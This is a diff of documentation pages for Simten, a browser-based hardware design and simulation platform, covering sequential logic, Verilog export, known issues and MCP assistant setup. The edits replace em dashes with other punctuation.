+Sequential logic remembers *when*: state advances on each clock tick.
 
 <CircuitEmbed
   circuit={DelayLine}
@@ -75,7 +75,7 @@ Sequential logic remembers *when* — state advances on each clock tick.
   }}
 />
 
-Toggle `d` and hit ▶. The bit shifts one stage per cycle — `q1` lags `d` by one tick, `q2` by two. Flip-flops remember; gates don't.
+Toggle `d` and hit ▶. The bit shifts one stage per cycle, so `q1` lags `d` by one tick, `q2` by two. Flip-flops remember; gates don't.
 
 ```ts
 const DelayLine = circuit('DelayLine', {
@@ -90,17 +90,17 @@ const DelayLine = circuit('DelayLine', {
 });
 ```
 
-The DSL is the same shape — `inputs`, `outputs`, `nodes`, `connect`. Sequentiality comes from which primitives you pick (`DFlipFlop`, `Register`, `RAM`), not from a separate sub-language.
+The DSL is the same shape: `inputs`, `outputs`, `nodes`, `connect`. Sequentiality comes from which primitives you pick (`DFlipFlop`, `Register`, `RAM`), not from a separate sub-language.
 
-Behind that is a single rule: a primitive is sequential when it declares `state`. `DFlipFlop` and `Register` do; `And` and `Adder` don't. There's no `sequential` flag and no base class — the `state` is the whole signal. A composite inherits it: your circuit is sequential the moment it holds something that is.
+Behind that is a single rule: a primitive is sequential when it declares `state`. `DFlipFlop` and `Register` do; `And` and `Adder` don't. There's no `sequential` flag and no base class; the `state` is the whole signal. A composite inherits it: your circuit is sequential the moment it holds something that is.
 
-That same declaration hands the circuit a clock. simten has exactly one. Every stateful element subscribes to a single `clk` the instant it declares `state`, so you never route it — there's no clock port on `Register`, no clock in `connect`. A register's own inputs — `data`, `we`, `rst` — are wires you draw. The clock is a broadcast every register already hears.
+That same declaration hands the circuit a clock. simten has exactly one. Every stateful element subscribes to a single `clk` the instant it declares `state`, so you never route it: there's no clock port on `Register`, no clock in `connect`. A register's own inputs (`data`, `we`, `rst`) are wires you draw. The clock is a broadcast every register already hears.
 
-So ▶ (or `tick()`) advances that one clock, and every register latches on the same edge. One clock, one tick, nothing to wire. It's also why simten is single-clock: no second domain, no dividers, no crossings. [Export](#5-export-to-verilog) reverses it — the exporter turns that implicit clock back into real `clk` and `rst_n` ports for the synthesizer.
+So ▶ (or `tick()`) advances that one clock, and every register latches on the same edge. One clock, one tick, nothing to wire. It's also why simten is single-clock: no second domain, no dividers, no crossings. [Export](#5-export-to-verilog) reverses it: the exporter turns that implicit clock back into real `clk` and `rst_n` ports for the synthesizer.
 
 ## 4. The trace is the truth
 
-Every value, every wire, every cycle is recorded. When something goes wrong you scrub backward to the exact cycle the bug appeared — no `printf`, no rerun, no guessing.
+Every value, every wire, every cycle is recorded. When something goes wrong you scrub backward to the exact cycle the bug appeared, with no `printf`, no rerun, no guessing.
 
 The [RISC-V CPU debugger](/learn/rv32i-cpu) is the longest worked example. It runs compiled C through a 5-stage pipeline; every register, every pipeline stage, every cycle is inspectable.
 
@@ -114,9 +114,9 @@ import { exportVerilog } from '@simten/core/verilog';
 const { verilog, files } = exportVerilog(HalfAdder, library, { target: 'synthesis' });
 ```
 
-The `synthesis` target strips simulation-only constructs. Memories above 2k words are emitted as `$readmemh` with the hex contents returned alongside — matching the Yosys/Vivado/Quartus convention.
+The `synthesis` target strips simulation-only constructs. Memories above 2k words are emitted as `$readmemh` with the hex contents returned alongside, matching the Yosys/Vivado/Quartus convention.
 
-Every emitted module that contains sequential logic also gets `clk` and `rst_n` ports — the exporter auto-plumbs both (your `circuit()` definitions don't reference clock or reset). `rst_n` is active-low and synchronous: when held low, registers reset to their `value` arg, memories preserve their contents, and RV32I register files zero. Your board wrapper must drive both pins.
+Every emitted module that contains sequential logic also gets `clk` and `rst_n` ports, and the exporter auto-plumbs both (your `circuit()` definitions don't reference clock or reset). `rst_n` is active-low and synchronous: when held low, registers reset to their `value` arg, memories preserve their contents, and RV32I register files zero. Your board wrapper must drive both pins.
 
 See [Hardware & FPGA](/docs/hardware) for the full pipeline (Yosys → nextpnr → ecppack → flash) using Snake on a ULX3S as the worked example.
 
@@ -124,7 +124,7 @@ See [Hardware & FPGA](/docs/hardware) for the full pipeline (Yosys → nextpnr �
 
 ## Where to go next
 
-- [Component model](/docs/component-model) — the full primitive list and the elaboration pipeline
-- [API reference](/docs/api-reference) — `circuit()`, `bit`, `bus`, exporters
-- [Examples](/docs/examples) — bigger circuits and how they're built
-- [Hardware & FPGA](/docs/hardware) — taking a Verilog export to a real board
+- [Component model](/docs/component-model): the full primitive list and the elaboration pipeline
+- [API reference](/docs/api-reference): `circuit()`, `bit`, `bus`, exporters
+- [Examples](/docs/examples): bigger circuits and how they're built
+- [Hardware & FPGA](/docs/hardware): taking a Verilog export to a real board

--- a/apps/web/content/docs/how-it-works.mdx
+++ b/apps/web/content/docs/how-it-works.mdx
@@ -1,6 +1,6 @@
 ---
 title: How it works
-description: A short tour of Simten's model: primitives, composites, time, and export.
+description: A short tour of Simten's model, covering primitives, composites, time, and export.
 ---
 
 import { CircuitEmbed } from '@simten/embed'

--- a/apps/web/content/docs/index.mdx
+++ b/apps/web/content/docs/index.mdx
@@ -7,22 +7,22 @@ Simten is a browser-based platform for learning digital hardware design. You wri
 
 ## What you can build
 
-Everything runs in the browser — no toolchain, no installation, no FPGA required.
+Everything runs in the browser: no toolchain, no installation, no FPGA required.
 
-- **Logic gates and adders** — start from AND, OR, XOR and build up to full adders and ALUs
-- **Sequential circuits** — counters, shift registers, state machines using registers and flip-flops
-- **Games in hardware** — [Snake](/blog/snake-in-hardware) and [Pong](/blog/pong-in-hardware), built entirely from logic gates with no CPU
-- **A complete CPU** — a [5-stage pipelined RISC-V processor](/blog/rv32i-cpu) that runs compiled C code
-- **Accelerators** — a [TPU systolic array](/blog/how-tpus-work) doing matrix multiplication, a [CORDIC unit](/blog/computing-trig-in-hardware) computing trigonometry
-- **Networking hardware** — an [Ethernet switch](/blog/how-network-switches-work) with frame parsing, buffering, and forwarding
+- **Logic gates and adders**: start from AND, OR, XOR and build up to full adders and ALUs
+- **Sequential circuits**: counters, shift registers, state machines using registers and flip-flops
+- **Games in hardware**: [Snake](/blog/snake-in-hardware) and [Pong](/blog/pong-in-hardware), built entirely from logic gates with no CPU
+- **A complete CPU**: a [5-stage pipelined RISC-V processor](/blog/rv32i-cpu) that runs compiled C code
+- **Accelerators**: a [TPU systolic array](/blog/how-tpus-work) doing matrix multiplication, a [CORDIC unit](/blog/computing-trig-in-hardware) computing trigonometry
+- **Networking hardware**: an [Ethernet switch](/blog/how-network-switches-work) with frame parsing, buffering, and forwarding
 
 ## Hardware & FPGA
 
-Circuits that export to Verilog can go all the way to a physical FPGA bitstream. The [Hardware & FPGA](/docs/hardware) page covers the full pipeline — Yosys synthesis, nextpnr place-and-route, ecppack, and flashing — using Snake running on a ULX3S ECP5 board over HDMI as a worked example.
+Circuits that export to Verilog can go all the way to a physical FPGA bitstream. The [Hardware & FPGA](/docs/hardware) page covers the full pipeline (Yosys synthesis, nextpnr place-and-route, ecppack, and flashing) using Snake running on a ULX3S ECP5 board over HDMI as a worked example.
 
 ## Verilog export
 
-Circuits export to synthesizable Verilog. The exporter maps 60+ primitives to standard RTL constructs — `assign` for combinational logic, `always @(posedge clk)` with synchronous active-low reset (`rst_n`) for sequential logic. Every module containing sequential primitives gets `input clk` and `input rst_n` ports auto-emitted (no clock or reset wiring in your `circuit()` definitions); on `rst_n` low, registers snap to their `value` arg, memories preserve contents, RV32I register files zero. The output is verified against [Icarus Verilog](https://steveicarus.github.io/iverilog/) via a containerized verification service.
+Circuits export to synthesizable Verilog. The exporter maps 60+ primitives to standard RTL constructs: `assign` for combinational logic, `always @(posedge clk)` with synchronous active-low reset (`rst_n`) for sequential logic. Every module containing sequential primitives gets `input clk` and `input rst_n` ports auto-emitted (no clock or reset wiring in your `circuit()` definitions); on `rst_n` low, registers snap to their `value` arg, memories preserve contents, RV32I register files zero. The output is verified against [Icarus Verilog](https://steveicarus.github.io/iverilog/) via a containerized verification service.
 
 ```typescript
 import { exportVerilog } from '@simten/core/verilog';
@@ -32,21 +32,21 @@ const { verilog, files } = exportVerilog(circuit, library, { target: 'synthesis'
 // (hex files referenced by $readmemh for large preloaded memories).
 ```
 
-The `target: 'synthesis'` option strips simulation-only constructs (`initial` blocks) for FPGA-ready output. Memories above `inlineMemoryThreshold` (default 2048 words) are emitted as `$readmemh("<file>.hex", reg)` with the hex contents returned alongside — matching the Yosys/Vivado/Quartus convention for large ROM/RAM initialization.
+The `target: 'synthesis'` option strips simulation-only constructs (`initial` blocks) for FPGA-ready output. Memories above `inlineMemoryThreshold` (default 2048 words) are emitted as `$readmemh("<file>.hex", reg)` with the hex contents returned alongside, matching the Yosys/Vivado/Quartus convention for large ROM/RAM initialization.
 
 ## AI tutor over MCP
 
-Connect an MCP-capable assistant — Claude Code, Codex CLI, Gemini CLI, Cursor, and others — to get an AI tutor that can see your circuit, push changes to the browser, run simulations, and answer questions in real time:
+Connect an MCP-capable assistant (Claude Code, Codex CLI, Gemini CLI, Cursor, and others) to get an AI tutor that can see your circuit, push changes to the browser, run simulations, and answer questions in real time:
 
 ```bash
 claude mcp add simten npx @simten/mcp
 ```
 
-Ask it to build a counter or debug your ALU — it writes the TypeScript and the circuit appears on your canvas instantly.
+Ask it to build a counter or debug your ALU, and it writes the TypeScript and the circuit appears on your canvas instantly.
 
 See the [MCP Integration](/docs/mcp-integration) guide for per-client setup, available tools, and how the MCP viewer works.
 
-Circuit code runs in an isolated sandbox — see [Security Architecture](/docs/security) for how Simten protects your credentials and filesystem from untrusted circuits.
+Circuit code runs in an isolated sandbox. See [Security Architecture](/docs/security) for how Simten protects your credentials and filesystem from untrusted circuits.
 
 ## Packages
 

--- a/apps/web/content/docs/known-issues.mdx
+++ b/apps/web/content/docs/known-issues.mdx
@@ -3,9 +3,9 @@ title: Known issues
 description: What doesn't work yet, how to recognize it, and what to do about it.
 ---
 
-This page is the **open** list — things that may still affect you. Fixed bugs live on closed GitHub issues; pull the latest `main` to pick them up.
+This page is the **open** list: things that may still affect you. Fixed bugs live on closed GitHub issues; pull the latest `main` to pick them up.
 
-If you hit something not listed here, please file an issue at [simtenHQ/simten](https://github.com/simtenHQ/simten/issues) — concrete repros are gold.
+If you hit something not listed here, please file an issue at [simtenHQ/simten](https://github.com/simtenHQ/simten/issues). Concrete repros are gold.
 
 ## Correctness
 
@@ -17,38 +17,38 @@ A focused audit of `elaboration.ts` (after fixing [#138](https://github.com/simt
 
 The multi-driver check runs per-circuit at `circuit()` definition time, not on the flattened netlist. If two primitives end up driving the same target through a feedthrough boundary, the conflict surfaces only after stitching and isn't caught.
 
-**How to recognize it:** wrong outputs in a circuit that drives a composite's output port from outside the composite (e.g. `inputs.B.to(p.y)` where `y` is `p`'s output). **Workaround:** don't drive a composite output port externally — the convention is that composite outputs are produced by the composite, not consumed as targets. The TS port-direction guard and the per-circuit multi-driver check together steer you away from this shape; the runtime gap only matters at API edge cases.
+**How to recognize it:** wrong outputs in a circuit that drives a composite's output port from outside the composite (e.g. `inputs.B.to(p.y)` where `y` is `p`'s output). **Workaround:** don't drive a composite output port externally; the convention is that composite outputs are produced by the composite, not consumed as targets. The TS port-direction guard and the per-circuit multi-driver check together steer you away from this shape; the runtime gap only matters at API edge cases.
 
 #### Width mismatches silently accepted at elaboration ([#144](https://github.com/simtenHQ/simten/issues/144), [#145](https://github.com/simtenHQ/simten/issues/145))
 
 Elaboration never validates port-type or width compatibility between source and target. A `bit` source driving a `bus(N)` target (#144) or a `bus(M)` source driving a `bus(N)` target with M ≠ N (#145) passes silently; downstream evaluators coerce inconsistently.
 
-**How to recognize it:** wrong values when a `Constant({ value: 1 })` (default width 1) drives a wider bus, or a narrower bus drives a wider one. **Workaround:** the TypeScript port-direction types reject these mismatches at compile time in typical use — the runtime gap mostly bites hand-constructed IR or `as any` escapes. Use the `width` argument on `Constant` (e.g. `Constant({ value: 1, width: 8 })`) and prefer width-matching primitives so the source and target agree.
+**How to recognize it:** wrong values when a `Constant({ value: 1 })` (default width 1) drives a wider bus, or a narrower bus drives a wider one. **Workaround:** the TypeScript port-direction types reject these mismatches at compile time in typical use, and the runtime gap mostly bites hand-constructed IR or `as any` escapes. Use the `width` argument on `Constant` (e.g. `Constant({ value: 1, width: 8 })`) and prefer width-matching primitives so the source and target agree.
 
 #### Deeply nested feedthrough composites produce a malformed netlist ([#146](https://github.com/simtenHQ/simten/issues/146))
 
-At three or more levels of composites whose *only* output mechanism is a feedthrough (`inputs.x.to(outputs.y)`, no gate at any level), elaboration produces a flat netlist where an internal primitive *input* port appears as a connection source and the top output has two drivers. Silent wrong values at simulation. Sibling class to [#138](https://github.com/simtenHQ/simten/issues/138) — depth-2 was fixed; depth ≥ 3 wasn't covered.
+At three or more levels of composites whose *only* output mechanism is a feedthrough (`inputs.x.to(outputs.y)`, no gate at any level), elaboration produces a flat netlist where an internal primitive *input* port appears as a connection source and the top output has two drivers. Silent wrong values at simulation. Sibling class to [#138](https://github.com/simtenHQ/simten/issues/138): depth-2 was fixed; depth ≥ 3 wasn't covered.
 
 **How to recognize it:** wrong outputs in a circuit that stacks ≥ 3 levels of pure-feedthrough composites (board-of-board-of-board layering, repeated abstraction wrappers without internal logic). **Workaround:** include at least one gate (`Not` → `Not`, `Buffer`, anything non-trivial) at one of the inner levels, or flatten the wrapping to ≤ 2 nested levels. Gated nesting at any depth elaborates correctly.
 
 #### Node-less composite with only a passthrough drops the signal ([#147](https://github.com/simtenHQ/simten/issues/147))
 
-A composite with `nodes: {}` and only an `inputs.x.to(outputs.y)` connection — essentially a "labeled wire" composite — elaborates without error but the simulator returns 0 instead of the input value.
+A composite with `nodes: {}` and only an `inputs.x.to(outputs.y)` connection, essentially a "labeled wire" composite, elaborates without error but the simulator returns 0 instead of the input value.
 
-**How to recognize it:** a passthrough composite with no internal nodes produces 0 at its output regardless of input. **Workaround:** add at least one internal node to any composite, even a dummy gate wired off to one side. The `Passthrough` fixture in `chained-passthrough.test.ts` uses the canonical workaround pattern — `inputs.x.to(d.in)` against a `Not` whose output is unused.
+**How to recognize it:** a passthrough composite with no internal nodes produces 0 at its output regardless of input. **Workaround:** add at least one internal node to any composite, even a dummy gate wired off to one side. The `Passthrough` fixture in `chained-passthrough.test.ts` uses the canonical workaround pattern: `inputs.x.to(d.in)` against a `Not` whose output is unused.
 
 ## Verilog export
 
 ### Hierarchical mode not yet implemented
 
-`verilog_export` currently emits a single flat module. The `mode: 'hierarchical'` option is accepted but not yet implemented (see `packages/core/src/verilog/exporter.ts`) — composite circuits are inlined into the top module rather than emitted as separate `module` declarations.
+`verilog_export` currently emits a single flat module. The `mode: 'hierarchical'` option is accepted but not yet implemented (see `packages/core/src/verilog/exporter.ts`); composite circuits are inlined into the top module rather than emitted as separate `module` declarations.
 
 **How to recognize it:** the exported Verilog contains a single top-level module regardless of how deeply nested the source circuit is. **Workaround:** flat export is fully functional for synthesis (Yosys and nextpnr accept it); use it as-is. If you need hierarchical Verilog for readability or third-party tool consumption, post-process the output or open an issue.
 
 ## Verilog import
 
 Import runs your RTL through Yosys and lifts the resulting netlist into simten source. The whole
-project goes in — every `.v` under a folder, plus parameters and any `$readmemh` data — and Yosys
+project goes in (every `.v` under a folder, plus parameters and any `$readmemh` data) and Yosys
 prunes whatever the top module doesn't reach. What follows is what the result can and can't do
 once it's in the simulator.
 
@@ -56,13 +56,13 @@ once it's in the simulator.
 
 If you are importing your own RTL to debug it, simten is strictly worse than the tool you already
 have: roughly a thousand times slower, two-state, and single-clock. The value here is *seeing* a
-design — clicking into a running CPU down to the gates, on a canvas, in a browser — not verifying
+design (clicking into a running CPU down to the gates, on a canvas, in a browser), not verifying
 one. Verify in Verilator or Icarus; import to look at it.
 
 ### Two-state: `x` and `z` both read as 0
 
 The engine has no unknown value. An uninitialised register reads 0 rather than `x`, so the
-X-propagation that catches missing resets in a conventional simulator finds nothing here — simten
+X-propagation that catches missing resets in a conventional simulator finds nothing here; simten
 will confidently agree with a wrong 0.
 
 **How to recognize it:** a design that fails on hardware over a missing reset simulates cleanly.
@@ -78,18 +78,18 @@ CDC, async FIFOs, DDR interfaces and multi-clock SoCs.
 
 **How to recognize it:** an import fails with a derived-clock error. **Workaround:** rewrite clock
 dividers and clock gating as clock enables, which is better practice anyway. Genuine multi-clock
-plumbing belongs in a hand-written wrapper around the imported design — the precedent is
+plumbing belongs in a hand-written wrapper around the imported design; the precedent is
 `hardware/ulx3s/projects/snake/snake_top.v`, which wraps an `EHXPLLL` around a single-clock simten
 core.
 
 ### A bare CPU core can't run a program
 
 `serv_rf_top` asserts `o_ibus_cyc` and waits forever for an ack that nothing produces. This is not
-a simten limitation — Verilator users hit the same wall, which is why these projects ship SoC
+a simten limitation; Verilator users hit the same wall, which is why these projects ship SoC
 wrappers.
 
 **How to recognize it:** the imported core's outputs settle and never change again.
-**Workaround:** import the *system*, not the core — `servant` rather than `serv_rf_top`,
+**Workaround:** import the *system*, not the core: `servant` rather than `serv_rf_top`,
 `picosoc` rather than `picorv32`. Wire its serial pin to `UART_RX({ cyclesPerBit })` and on to a
 `Console` to read what the program prints.
 
@@ -97,10 +97,10 @@ wrappers.
 
 Yosys lifts `$display`/`$write` to `$print` cells, which have no hardware meaning. They are skipped
 with a warning naming the module and source line rather than failing the import, so a debug
-statement doesn't take a whole design down — but the output is gone.
+statement doesn't take a whole design down, but the output is gone.
 
 **How to recognize it:** an import warning like `servant_ram: dropped 1 $display/$write
-statement(s)`. **Workaround:** none — read the design's real outputs instead.
+statement(s)`. **Workaround:** none; read the design's real outputs instead.
 
 ### Imported designs usually can't be exported back to Verilog
 
@@ -109,7 +109,7 @@ that the Verilog exporter has no mapping for. Export refuses rather than emittin
 parses and does the wrong thing.
 
 **How to recognize it:** the Verilog button reads `Can't export: N unsupported nodes (…)`.
-**Workaround:** none — the original RTL is the thing to synthesize. Round-tripping through import
+**Workaround:** none; the original RTL is the thing to synthesize. Round-tripping through import
 was never the point.
 
 Buses wider than 32 bits are the other thing worth knowing about before you import; see
@@ -128,11 +128,11 @@ The MCP VCD parser (`packages/mcp/src/lib/vcd-parser.ts`) does not yet drive all
 
 Some stdlib primitives exist for visualisation/debugging and are not part of the Verilog export. They simulate fine, but they will be excluded from any synthesized output. They are marked `meta: { synthesizable: false }` in `@simten/core/std`:
 
-- `Console` — text output (display)
-- `UART_RX` — serial pin to bytes (pairs with `Console` for imported SoCs)
-- `HexDisplay`, `SevenSegment` — numeric readouts
-- `Screen`, `RasterDisplay` — framebuffer surfaces
-- `Probe` — debug observation
+- `Console`: text output (display)
+- `UART_RX`: serial pin to bytes (pairs with `Console` for imported SoCs)
+- `HexDisplay`, `SevenSegment`: numeric readouts
+- `Screen`, `RasterDisplay`: framebuffer surfaces
+- `Probe`: debug observation
 
 **How to recognize it:** the circuit simulates and renders, but `verilog_export` (or the FPGA build) either omits the node or errors. **Workaround:** wrap simulation-only display logic behind a top-level signal you can leave unwired on synthesis, or mark the wrapper circuit `meta: { synthesizable: false }` so it's expected.
 
@@ -146,17 +146,17 @@ The `/circuit` page (and the `show_circuit` MCP canvas) runs your code inside a 
 
 **How to recognize it:** ReferenceError on the imported binding. **Workaround:** check the package on esm.sh directly (e.g. `https://esm.sh/<pkg>`); use a known-good version pin (`'pkg@4.3.2'`); for Node-only packages, fall back to baking the data into a `Constant`/`ROM` outside the browser path.
 
-### Cross-file (multi-file) imports aren't resolved — only `@simten/core/*`
+### Cross-file (multi-file) imports aren't resolved, only `@simten/core/*`
 
-Circuit code submitted to the `/circuit` editor and `show_circuit` is executed by **stripping its `import` statements** and injecting the `@simten/core` stdlib into scope (browser: `apps/sandbox/src/rewrite-imports.ts`). So a circuit may import from `@simten/core/*` (resolved from injected scope) and — in the browser — bare npm specifiers (resolved via esm.sh), but it **cannot** import another local file (`./helper.ts`, `../shared.circuit.ts`): the relative specifier passes through and resolves to nothing (no filesystem in the sandbox), so the binding is `undefined`. The host tools `check_circuit` and `simulate_circuit` share this limitation — they run the same import-stripping executor (`executeCircuitCode` in `packages/core/src/circuit/execute.ts`).
+Circuit code submitted to the `/circuit` editor and `show_circuit` is executed by **stripping its `import` statements** and injecting the `@simten/core` stdlib into scope (browser: `apps/sandbox/src/rewrite-imports.ts`). So a circuit may import from `@simten/core/*` (resolved from injected scope) and, in the browser, bare npm specifiers (resolved via esm.sh), but it **cannot** import another local file (`./helper.ts`, `../shared.circuit.ts`): the relative specifier passes through and resolves to nothing (no filesystem in the sandbox), so the binding is `undefined`. The host tools `check_circuit` and `simulate_circuit` share this limitation; they run the same import-stripping executor (`executeCircuitCode` in `packages/core/src/circuit/execute.ts`).
 
 `verify_circuit` is the exception: it runs the file under real `tsx` with full Node module resolution, so multi-file testbenches (relative imports, workspace packages, npm) work there exactly like `npm test`.
 
-**How to recognize it:** `X is not defined` / `undefined` for a binding imported from a relative path, in the `/circuit` editor or via `check_circuit` / `simulate_circuit` — while the same file runs fine under `verify_circuit`. **Workaround:** keep canvas/simulate circuits single-file, importing only from `@simten/core/*`; promote shared circuits into `@simten/core/std` so they resolve via injected scope. For genuinely multi-file work, use `verify_circuit`. A real fix would add a bundling/module-resolution step before execution — esbuild-bundling the entry plus its local files on the host, and a virtual-FS (or bundling) step in the sandbox — so `/circuit` and the host tools could accept multi-file circuits; tracked as a future enhancement.
+**How to recognize it:** `X is not defined` / `undefined` for a binding imported from a relative path, in the `/circuit` editor or via `check_circuit` / `simulate_circuit`, while the same file runs fine under `verify_circuit`. **Workaround:** keep canvas/simulate circuits single-file, importing only from `@simten/core/*`; promote shared circuits into `@simten/core/std` so they resolve via injected scope. For genuinely multi-file work, use `verify_circuit`. A real fix would add a bundling/module-resolution step before execution (esbuild-bundling the entry plus its local files on the host, and a virtual-FS (or bundling) step in the sandbox) so `/circuit` and the host tools could accept multi-file circuits; tracked as a future enhancement.
 
 ### `Buffer` is Node-only
 
-A common gotcha when porting a verify testbench to a browser demo: `Buffer.from([...])` works under `tsx`/`node` but is not defined in the browser sandbox. Use `Uint8Array.of(...)` / `new Uint8Array([...])` instead — most npm crypto/hash packages accept it at runtime even when their TypeScript types only declare `Buffer`.
+A common gotcha when porting a verify testbench to a browser demo: `Buffer.from([...])` works under `tsx`/`node` but is not defined in the browser sandbox. Use `Uint8Array.of(...)` / `new Uint8Array([...])` instead; most npm crypto/hash packages accept it at runtime even when their TypeScript types only declare `Buffer`.
 
 ### Worker compile timeout (5s)
 
@@ -166,17 +166,17 @@ Every circuit compile/elaborate runs inside a worker that the sandbox will kill 
 
 ### `postMessage … could not be cloned` console warning
 
-You may see a `postMessage` warning in the browser console — something the iframe sandbox tried to post wasn't structured-cloneable. It's benign: it appears on both the hosted `/circuit` page and the local MCP viewer (it isn't introduced by either), and it doesn't affect compilation, simulation, or rendering.
+You may see a `postMessage` warning in the browser console: something the iframe sandbox tried to post wasn't structured-cloneable. It's benign: it appears on both the hosted `/circuit` page and the local MCP viewer (it isn't introduced by either), and it doesn't affect compilation, simulation, or rendering.
 
 **How to recognize it:** a one-off `… could not be cloned` warning in DevTools, with no visible effect on the canvas. **Workaround:** none needed; safe to ignore. Tracked as low-priority.
 
 ## Editor type checking
 
-### `Screen` squiggles — lib.dom's `Screen` shadows the stdlib component
+### `Screen` squiggles: lib.dom's `Screen` shadows the stdlib component
 
-The `/circuit` editor type-checks with TypeScript's full default lib, which includes `lib.dom` — and lib.dom declares a global `var Screen` (the `window.Screen` constructor). That shadows the stdlib `Screen` component's global typing, so `Screen` in a node list shows a type error even though the circuit compiles and simulates fine (execution strips types and injects the real component; the editor's diagnostics are cosmetic here). `Screen` is the only stdlib name with this value-level collision — `Console`, `Input`, etc. only collide with DOM *interfaces*, which is harmless.
+The `/circuit` editor type-checks with TypeScript's full default lib, which includes `lib.dom`, and lib.dom declares a global `var Screen` (the `window.Screen` constructor). That shadows the stdlib `Screen` component's global typing, so `Screen` in a node list shows a type error even though the circuit compiles and simulates fine (execution strips types and injects the real component; the editor's diagnostics are cosmetic here). `Screen` is the only stdlib name with this value-level collision; `Console`, `Input`, etc. only collide with DOM *interfaces*, which is harmless.
 
-**How to recognize it:** a squiggle on `Screen` while the circuit runs normally. **Workaround:** ignore it — runtime is unaffected. Don't try to fix it by dropping `lib.dom` from the editor's compiler options: Monaco's worker fails to load replacement libs and you lose `Array`/string typing entirely, which is far worse.
+**How to recognize it:** a squiggle on `Screen` while the circuit runs normally. **Workaround:** ignore it; runtime is unaffected. Don't try to fix it by dropping `lib.dom` from the editor's compiler options: Monaco's worker fails to load replacement libs and you lose `Array`/string typing entirely, which is far worse.
 
 ## Simulator limits
 
@@ -188,19 +188,19 @@ Each `set()` / clock tick drives an event-driven propagation queue. After 10 000
 Propagation did not stabilize after 10000 iterations. Possible unstable feedback loop in circuit.
 ```
 
-This is a safety net for **combinational feedback loops with no register breaking them** (an inverter whose output feeds its own input, etc.). It is not a depth/size limit — feed-forward circuits of any practical size settle well below the cap.
+This is a safety net for **combinational feedback loops with no register breaking them** (an inverter whose output feeds its own input, etc.). It is not a depth/size limit; feed-forward circuits of any practical size settle well below the cap.
 
 **How to recognize it:** the error message above. **Workaround:** find the combinational loop; break it with a `Register` or `DFlipFlop`.
 
 ### `get()` only reads top-level output ports
 
-`simulate(C).get('foo')` reads top-level outputs of `C` reliably. Reading an *internal node's* port (`'subModule.out'`) returns 0 / uninitialised values regardless of the actual signal — it is not a supported observation API.
+`simulate(C).get('foo')` reads top-level outputs of `C` reliably. Reading an *internal node's* port (`'subModule.out'`) returns 0 / uninitialised values regardless of the actual signal; it is not a supported observation API.
 
 **How to recognize it:** an internal port reads 0 even when wiring and logic say otherwise. **Workaround:** expose the value you need as a top-level output of the circuit under test (wrap it in a probe harness with the signal piped out).
 
 ### Buses wider than 32 bits don't simulate
 
-The numeric engine stores every net in an `Int32Array` and evaluates with JavaScript bitwise operators — both 32-bit. A bus wider than 32 bits simulates to wrong values with no error: inputs truncate to their low 32 bits, a `Slice` at offset ≥ 32 aliases back to the low bits (JS shift counts wrap mod 32), and wide `Concat`/arithmetic overflow to 0. Export, import, and FPGA synthesis are unaffected — they carry the full width; only the in-engine simulator has the ceiling.
+The numeric engine stores every net in an `Int32Array` and evaluates with JavaScript bitwise operators, both 32-bit. A bus wider than 32 bits simulates to wrong values with no error: inputs truncate to their low 32 bits, a `Slice` at offset ≥ 32 aliases back to the low bits (JS shift counts wrap mod 32), and wide `Concat`/arithmetic overflow to 0. Export, import, and FPGA synthesis are unaffected: they carry the full width; only the in-engine simulator has the ceiling.
 
-**How to recognize it:** a circuit with a port or internal net wider than 32 bits (a 512-bit input, a 64-bit datapath) reads plausible-but-wrong values — or 0 — from `simulate()` / `verify_circuit`, while its exported Verilog checks out. Quick tell: a `Slice` at offset 32 returns the same bits as the same slice at offset 0. This is why imports of wide-bus designs (e.g. a matrix-vector unit) lift and export fine but can't be run through the TS simulator. **Workaround:** none in-engine — keep simulated buses ≤ 32 bits (split wide datapaths into ≤ 32-bit lanes), or verify wide designs through the Verilog path (export and cross-check against Icarus Verilog) instead of the TS simulator. A real fix means representing wide nets as `BigInt` or word arrays through the engine and evaluators.
+**How to recognize it:** a circuit with a port or internal net wider than 32 bits (a 512-bit input, a 64-bit datapath) reads plausible-but-wrong values (or 0) from `simulate()` / `verify_circuit`, while its exported Verilog checks out. Quick tell: a `Slice` at offset 32 returns the same bits as the same slice at offset 0. This is why imports of wide-bus designs (e.g. a matrix-vector unit) lift and export fine but can't be run through the TS simulator. **Workaround:** none in-engine; keep simulated buses ≤ 32 bits (split wide datapaths into ≤ 32-bit lanes), or verify wide designs through the Verilog path (export and cross-check against Icarus Verilog) instead of the TS simulator. A real fix means representing wide nets as `BigInt` or word arrays through the engine and evaluators.
 

--- a/apps/web/content/docs/mcp-integration.mdx
+++ b/apps/web/content/docs/mcp-integration.mdx
@@ -1,9 +1,9 @@
 ---
 title: MCP Integration
-description: Drive Simten from any MCP-compatible AI assistant — build, simulate, and verify circuits from your terminal
+description: Drive Simten from any MCP-compatible AI assistant. Build, simulate, and verify circuits from your terminal
 ---
 
-Simten ships an MCP server (`@simten/mcp`) that any MCP-compatible AI assistant can drive — Claude Code, Codex CLI, Gemini CLI, Cursor, and others. You talk to your assistant in the terminal; it writes TypeScript circuit files, pushes them to a live viewer in your browser, and runs simulations and verification — so you watch the circuit take shape on a canvas as it's built.
+Simten ships an MCP server (`@simten/mcp`) that any MCP-compatible AI assistant can drive: Claude Code, Codex CLI, Gemini CLI, Cursor, and others. You talk to your assistant in the terminal; it writes TypeScript circuit files, pushes them to a live viewer in your browser, and runs simulations and verification, so you watch the circuit take shape on a canvas as it's built.
 
 It's a standard stdio MCP server, so the tools below are the same whatever client you point at it. The examples on this page use [Claude Code](https://claude.ai/claude-code) as the reference client.
 
@@ -12,10 +12,10 @@ It's a standard stdio MCP server, so the tools below are the same whatever clien
 You run your assistant in the terminal. When you ask it to build something, it:
 
 1. Writes the TypeScript circuit definition to a file
-2. Pushes it to a live viewer in your browser — the circuit appears on the canvas instantly
+2. Pushes it to a live viewer in your browser, and the circuit appears on the canvas instantly
 3. Runs a simulation, or a self-checking testbench, to confirm it behaves correctly
 
-The browser is a **viewer**: the assistant pushes circuits, waveforms, and test results to it for display. It is one-way by design — the page shows what was built and sends nothing actionable back (see [Security](/docs/security#local-studio-server)). You drive the conversation from the terminal, where your assistant already lives.
+The browser is a **viewer**: the assistant pushes circuits, waveforms, and test results to it for display. It is one-way by design: the page shows what was built and sends nothing actionable back (see [Security](/docs/security#local-studio-server)). You drive the conversation from the terminal, where your assistant already lives.
 
 ## Setup
 
@@ -31,7 +31,7 @@ Pick your client:
 
 This registers the Simten MCP server with your assistant, which now has access to the circuit design tools.
 
-### 3. That's it — the viewer opens itself
+### 3. That's it, and the viewer opens itself
 
